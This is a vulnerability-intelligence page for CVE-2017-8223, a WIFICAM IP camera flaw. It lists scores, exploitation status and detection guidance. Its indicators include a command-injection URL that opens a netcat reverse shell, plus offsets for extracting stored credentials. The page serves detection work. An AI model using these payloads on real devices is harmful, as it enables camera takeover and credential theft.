CVE-2017-8223
published 2017-04-25CVE-2017-8223: On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1…
PriorityP178high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.30%
89.9th percentile
On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.
Detection & IOCsextracted from sources · hover to see the quote
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
bytes↗
0x0a 0x0a 0x0a 0x0a 0x01
- →Detect unauthenticated RTSP stream access on port 10554/tcp using RTSP paths av0_0 or av0_1 — no authentication challenge is issued by the device ↗
- →Alert on HTTP GET requests to /set_ftp.cgi or /ftptest.cgi containing shell metacharacters (e.g., $(), nc, wget) in the 'pwd' parameter — this is the command injection vector ↗
- →Credentials are stored in binary config dump with a recognisable 4-byte marker (0x0a 0x0a 0x0a 0x0a 0x01); credential extraction offsets +138 (username) and +170 (password) from this marker ↗
- →The exploit targets port 80/tcp (CAM_PORT) for the HTTP command injection stage; monitor for sequential GET requests to /set_ftp.cgi followed by /ftptest.cgi from the same source IP ↗
- ·Two alternative payload variants exist for the FTP pwd injection: one using '+' instead of '%20' for spaces, and one using wget to fetch and execute a remote binary — detections must cover both encoding styles ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-544q-3wwf-w964: On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via t
ghsa_unreviewed·2022-05-17
CVE-2017-8223 [HIGH] CWE-287 GHSA-544q-3wwf-w964: On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via t
On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Improper Authentication
vulncheck·2017·CVSS 7.5
CVE-2017-8223 [HIGH] wificam wireless_ip_camera_\(p2p\)_firmware Improper Authentication
wificam wireless_ip_camera_\(p2p\)_firmware Improper Authentication
On Wireless IP Camera (P2P) WIFICAM devices, an attacker can use the RTSP server on port 10554/tcp to watch the streaming without authentication via tcp/av0_1 or tcp/av0_0.
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.
2017-04-25
Published
Exploited in the wild